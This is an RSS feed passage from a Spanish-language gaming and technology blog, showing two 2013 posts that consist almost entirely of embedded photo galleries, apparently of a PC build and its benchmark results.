<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:gd="http://schemas.google.com/g/2005" xmlns:georss="http://www.georss.org/georss" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-4636869601854204167</atom:id><lastBuildDate>Sun, 21 Jan 2024 01:38:03 +0000</lastBuildDate><category>Tecnologia</category><category>Humor</category><category>Ciencia</category><category>Wallpapers</category><category>Japon</category><category>Programacion</category><category>Video</category><category>Colombia</category><category>Anonymous</category><category>Anime</category><category>Social</category><category>Video Juegos</category><category>Cosplay</category><category>Descargable</category><category>Gamers</category><category>Hackeo</category><title>BIOHAZARD SIDE</title><description>|☣|☣|☣|☣|☣| Se libre , piensa libre , vive libre , siéntete libre |☣|☣|☣|☣|☣| El ultimo mundo libre muere ..... Internet agoniza , si no puedes hacer algo , siéntate y velo morir |☣|☣|☣|☣|☣| En la vida tendrás siempre dos opciones , ser cambiado por el mundo o cambiar el mundo |☣|☣|☣|☣|☣| Una gran idea esta hecha de muchas ideas pequeñas |☣|☣|☣|☣|☣| Leer por leer es malo , escribir por rellenar no es bueno , ver para creer no esta nada mal , ver todos los puntos de vista es esencial |☣|☣|☣|☣|☣| La vida es una batalla , depende de ti escoger tu bando |☣|☣|☣|☣|☣| Compartir conocimiento es obligación  |☣|☣|☣|☣|☣| La humanidad es inteligente , pero la masa es tonta y temerosa |☣|☣|☣|☣|☣|</description><link>http://ibiohazardi.blogspot.com/</link><managingEditor>noreply@blogger.com (El Bio Gamer)</managingEditor><generator>Blogger</generator><openSearch:totalResults>7836</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-5328067322309632467</guid><pubDate>Wed, 17 Jul 2013 05:23:00 +0000</pubDate><atom:updated>2013-07-17T00:23:01.075-05:00</atom:updated><title>PC-ITO</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-Yt6Ktitgce8/UAGg_8bkJ8I/AAAAAAAATY4/FjLshpGi7Ng/s1600/No+overclocking+-+3DMark+-+Benchmark.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="202" src="http://1.bp.blogspot.com/-Yt6Ktitgce8/UAGg_8bkJ8I/AAAAAAAATY4/FjLshpGi7Ng/s320/No+overclocking+-+3DMark+-+Benchmark.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-KQGCqjm6_DA/UAGhBEbcb6I/AAAAAAAATZE/JmsrXjh-b3o/s1600/No+overclocking+-+Unigine+-+Benchmark.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-KQGCqjm6_DA/UAGhBEbcb6I/AAAAAAAATZE/JmsrXjh-b3o/s320/No+overclocking+-+Unigine+-+Benchmark.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-cDMctPs4gDk/UAGhAe2_xcI/AAAAAAAATY8/sUAIO88ZWTg/s1600/No+overclocking+FF+-+BenchMark.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="186" src="http://1.bp.blogspot.com/-cDMctPs4gDk/UAGhAe2_xcI/AAAAAAAATY8/sUAIO88ZWTg/s320/No+overclocking+FF+-+BenchMark.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-X2felDfdxDY/UAD9U4s4BXI/AAAAAAAATTg/aSLfwbYy2c8/s1600/000_0004.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-X2felDfdxDY/UAD9U4s4BXI/AAAAAAAATTg/aSLfwbYy2c8/s320/000_0004.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-ZoOxcxvmrEA/UAD9a-IhbcI/AAAAAAAATT4/YYczw03190Y/s1600/000_0006.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-ZoOxcxvmrEA/UAD9a-IhbcI/AAAAAAAATT4/YYczw03190Y/s320/000_0006.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-FGHVtQARk9Y/UAD9aiRaG1I/AAAAAAAATT0/yXnII28b60g/s1600/000_0007.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-FGHVtQARk9Y/UAD9aiRaG1I/AAAAAAAATT0/yXnII28b60g/s320/000_0007.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/--0IUfXmMQAQ/UAD9f0j262I/AAAAAAAATUQ/LbqHxag2Cpg/s1600/100_1600.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/--0IUfXmMQAQ/UAD9f0j262I/AAAAAAAATUQ/LbqHxag2Cpg/s320/100_1600.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-HHiyLuFiTQk/UAD9fS5uMrI/AAAAAAAATUM/MXv_rYTOR5k/s1600/100_1604.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-HHiyLuFiTQk/UAD9fS5uMrI/AAAAAAAATUM/MXv_rYTOR5k/s320/100_1604.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-8pKOZNLjD0k/UAD9gSMNzvI/AAAAAAAATUY/UWiX-GG-ueI/s1600/100_1605.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-8pKOZNLjD0k/UAD9gSMNzvI/AAAAAAAATUY/UWiX-GG-ueI/s320/100_1605.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-nIdUGV1F6qo/UAD9jcH_uTI/AAAAAAAATUk/mVRzVLsxQ8w/s1600/100_1607.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-nIdUGV1F6qo/UAD9jcH_uTI/AAAAAAAATUk/mVRzVLsxQ8w/s320/100_1607.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-pRXPaUQiAHA/UAD9ko0YwDI/AAAAAAAATUw/eQKfFTgjKnY/s1600/100_1608.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-pRXPaUQiAHA/UAD9ko0YwDI/AAAAAAAATUw/eQKfFTgjKnY/s320/100_1608.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-uKaEm01Ljis/UAD9mvEItGI/AAAAAAAATU8/w9gLnQH0ulM/s1600/100_1609.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-uKaEm01Ljis/UAD9mvEItGI/AAAAAAAATU8/w9gLnQH0ulM/s320/100_1609.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-WQ-DVCmxTMw/UAD9nmrRdDI/AAAAAAAATVA/-atRyRhQIeY/s1600/100_1610.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-WQ-DVCmxTMw/UAD9nmrRdDI/AAAAAAAATVA/-atRyRhQIeY/s320/100_1610.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-f5AsvTqrdSY/UAD99PH3otI/AAAAAAAATVY/Z8epCLRfRhE/s1600/100_1635.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-f5AsvTqrdSY/UAD99PH3otI/AAAAAAAATVY/Z8epCLRfRhE/s320/100_1635.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-A9aX5pWEnJs/UAD-AZNF6mI/AAAAAAAATVo/9N6vLRAEO48/s1600/100_1636.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-A9aX5pWEnJs/UAD-AZNF6mI/AAAAAAAATVo/9N6vLRAEO48/s320/100_1636.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-QK25tF92sO4/UAD-Bkrt4DI/AAAAAAAATV0/Fkv9uXvMDA8/s1600/100_1637.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-QK25tF92sO4/UAD-Bkrt4DI/AAAAAAAATV0/Fkv9uXvMDA8/s320/100_1637.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-naP6lM0mefk/UAD98cFD-6I/AAAAAAAATVQ/q1tHzQnbrWg/s1600/100_1633.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-naP6lM0mefk/UAD98cFD-6I/AAAAAAAATVQ/q1tHzQnbrWg/s320/100_1633.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-k_OwMRCDx9I/UAD-BiYosqI/AAAAAAAATVw/HrV61fhSe3s/s1600/100_1639.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-k_OwMRCDx9I/UAD-BiYosqI/AAAAAAAATVw/HrV61fhSe3s/s320/100_1639.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-pD9wx1hBobs/UAD98tgUZ6I/AAAAAAAATVU/Pho5Gb5ezTM/s1600/100_1634.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-pD9wx1hBobs/UAD98tgUZ6I/AAAAAAAATVU/Pho5Gb5ezTM/s320/100_1634.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-daCGIGbtiRU/UAD-FlsH1VI/AAAAAAAATWA/hFoXYLhMi9A/s1600/100_1641.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-daCGIGbtiRU/UAD-FlsH1VI/AAAAAAAATWA/hFoXYLhMi9A/s320/100_1641.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-Zu-uyP8FuRk/UAD-Lu_1ePI/AAAAAAAATWg/xnhd-DGOUjE/s1600/100_1648.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-Zu-uyP8FuRk/UAD-Lu_1ePI/AAAAAAAATWg/xnhd-DGOUjE/s320/100_1648.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-0ODXd4vkzTk/UAD-MvHsHTI/AAAAAAAATWo/Y88qXi_gOCo/s1600/100_1649.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-0ODXd4vkzTk/UAD-MvHsHTI/AAAAAAAATWo/Y88qXi_gOCo/s320/100_1649.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-WE7O3w6r_RQ/UAD-GRMpIbI/AAAAAAAATWE/1y10rkiwO1g/s1600/100_1642.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-WE7O3w6r_RQ/UAD-GRMpIbI/AAAAAAAATWE/1y10rkiwO1g/s320/100_1642.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-SIgpfUx143U/UAD-H4LGwLI/AAAAAAAATWQ/AtThWQn9O78/s1600/100_1643.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-SIgpfUx143U/UAD-H4LGwLI/AAAAAAAATWQ/AtThWQn9O78/s320/100_1643.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-o7Fg85LxONU/UAD-OV_NkYI/AAAAAAAATW4/FrUsYeYs2D4/s1600/100_1650.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-o7Fg85LxONU/UAD-OV_NkYI/AAAAAAAATW4/FrUsYeYs2D4/s320/100_1650.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-6dGBGfmI91I/UAD-KA6-33I/AAAAAAAATWY/esbtyhCI-8U/s1600/100_1644.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-6dGBGfmI91I/UAD-KA6-33I/AAAAAAAATWY/esbtyhCI-8U/s320/100_1644.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-h7FqtR_VgwA/UAD-L3qrhTI/AAAAAAAATWk/XrW3KzcXuLk/s1600/100_1645.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-h7FqtR_VgwA/UAD-L3qrhTI/AAAAAAAATWk/XrW3KzcXuLk/s320/100_1645.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-7C_CklIROC4/UAD-O6smPHI/AAAAAAAATW8/gJhJZP_8Bds/s1600/100_1651.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-7C_CklIROC4/UAD-O6smPHI/AAAAAAAATW8/gJhJZP_8Bds/s320/100_1651.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-JvCam0KbV8M/UAD-TAXpgxI/AAAAAAAATXo/mVsv7xa0cp4/s1600/100_1655.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-JvCam0KbV8M/UAD-TAXpgxI/AAAAAAAATXo/mVsv7xa0cp4/s320/100_1655.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-Ftg6vjvFIyQ/UAD-SR74R0I/AAAAAAAATXY/9YJRRTnaOXk/s1600/100_1654.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-Ftg6vjvFIyQ/UAD-SR74R0I/AAAAAAAATXY/9YJRRTnaOXk/s320/100_1654.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-BUI7D5ihy_o/UAD-St8dknI/AAAAAAAATXc/0qS9MUuZVU0/s1600/100_1653.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-BUI7D5ihy_o/UAD-St8dknI/AAAAAAAATXc/0qS9MUuZVU0/s320/100_1653.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-qE72GCNhcAg/UAD-PYXIxRI/AAAAAAAATXE/vaSQa59-qPs/s1600/100_1652.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-qE72GCNhcAg/UAD-PYXIxRI/AAAAAAAATXE/vaSQa59-qPs/s320/100_1652.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-AJnYt2HRHuE/UAD-VS3YSnI/AAAAAAAATXs/x3dK6_IwRfg/s1600/100_1656.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-AJnYt2HRHuE/UAD-VS3YSnI/AAAAAAAATXs/x3dK6_IwRfg/s320/100_1656.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-7XKkecw_VRY/UAD-WdQ9-ZI/AAAAAAAATX4/OGhrTHUztao/s1600/100_1657.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-7XKkecw_VRY/UAD-WdQ9-ZI/AAAAAAAATX4/OGhrTHUztao/s320/100_1657.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-Jml19QJmH30/UAD-Wy7my1I/AAAAAAAATX8/sNmxS4uoECk/s1600/100_1658.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-Jml19QJmH30/UAD-Wy7my1I/AAAAAAAATX8/sNmxS4uoECk/s320/100_1658.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-0ChjxOxJ4Ew/UAD-XUJrK0I/AAAAAAAATYA/_u5Z_E55CRE/s1600/100_1661.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-0ChjxOxJ4Ew/UAD-XUJrK0I/AAAAAAAATYA/_u5Z_E55CRE/s320/100_1661.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-x1m1gFgDgBU/UAD-Y6TTSZI/AAAAAAAATYQ/5bQKXsbsFMQ/s1600/100_1662.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-x1m1gFgDgBU/UAD-Y6TTSZI/AAAAAAAATYQ/5bQKXsbsFMQ/s320/100_1662.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/07/pc-ito.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://1.bp.blogspot.com/-Yt6Ktitgce8/UAGg_8bkJ8I/AAAAAAAATY4/FjLshpGi7Ng/s72-c/No+overclocking+-+3DMark+-+Benchmark.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-7141489978465638560</guid><pubDate>Wed, 17 Jul 2013 05:19:00 +0000</pubDate><atom:updated>2013-07-17T00:19:50.999-05:00</atom:updated><title>Cualquier Cosa</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-ppeJT0ebcNw/UcEhhFuvmqI/AAAAAAAAcuc/e6cdwJC75cg/s1600/100_2060.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-ppeJT0ebcNw/UcEhhFuvmqI/AAAAAAAAcuc/e6cdwJC75cg/s320/100_2060.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-EThUEZ7yui4/UcEhhAyrAtI/AAAAAAAAcug/5fPshxRNAvA/s1600/100_2061.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-EThUEZ7yui4/UcEhhAyrAtI/AAAAAAAAcug/5fPshxRNAvA/s320/100_2061.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-YgWZr2JNeuc/UcEhhAII49I/AAAAAAAAcuk/D0zalQFTHSA/s1600/100_2062.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-YgWZr2JNeuc/UcEhhAII49I/AAAAAAAAcuk/D0zalQFTHSA/s320/100_2062.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-EOcAyOFZs-4/UcEhi-MPp9I/AAAAAAAAcus/0SODpskC4To/s1600/100_2063.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-EOcAyOFZs-4/UcEhi-MPp9I/AAAAAAAAcus/0SODpskC4To/s320/100_2063.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-1x8SFrcPeLk/UcEhkKLE46I/AAAAAAAAcu8/86etMCUr8Xc/s1600/100_2064.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-1x8SFrcPeLk/UcEhkKLE46I/AAAAAAAAcu8/86etMCUr8Xc/s320/100_2064.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-_XZDEb7J104/UcEhkPeNgLI/AAAAAAAAcvA/1QiIQ6OGSls/s1600/100_2065.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://4.bp.blogspot.com/-_XZDEb7J104/UcEhkPeNgLI/AAAAAAAAcvA/1QiIQ6OGSls/s320/100_2065.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-N15ru_vkdv4/UeYkIc94YII/AAAAAAAAc6Q/CWXQZjz6R2A/s1600/100_2157.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-N15ru_vkdv4/UeYkIc94YII/AAAAAAAAc6Q/CWXQZjz6R2A/s320/100_2157.JPG" width="240" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-QY28OAfJKNc/UcEhm2YZF3I/AAAAAAAAcvc/ktCH1Rq4b_8/s1600/100_2069.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-QY28OAfJKNc/UcEhm2YZF3I/AAAAAAAAcvc/ktCH1Rq4b_8/s320/100_2069.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-rSuRCbs05rw/UcEhmkWOpnI/AAAAAAAAcvY/G7q94g3lmKg/s1600/100_2068.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-rSuRCbs05rw/UcEhmkWOpnI/AAAAAAAAcvY/G7q94g3lmKg/s320/100_2068.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-z1pPmQxh1O4/UcEhmg-G66I/AAAAAAAAcvU/pfs8RJIOmJY/s1600/100_2067.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-z1pPmQxh1O4/UcEhmg-G66I/AAAAAAAAcvU/pfs8RJIOmJY/s320/100_2067.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-Pdi7-pNRfd0/UcEhkr0NmII/AAAAAAAAcvE/AtlMf-BCzmM/s1600/100_2066.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-Pdi7-pNRfd0/UcEhkr0NmII/AAAAAAAAcvE/AtlMf-BCzmM/s320/100_2066.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-MXzXXofC2RQ/UeYkIisD5xI/AAAAAAAAc6U/u88A6wDpMhQ/s1600/100_2158.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-MXzXXofC2RQ/UeYkIisD5xI/AAAAAAAAc6U/u88A6wDpMhQ/s320/100_2158.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
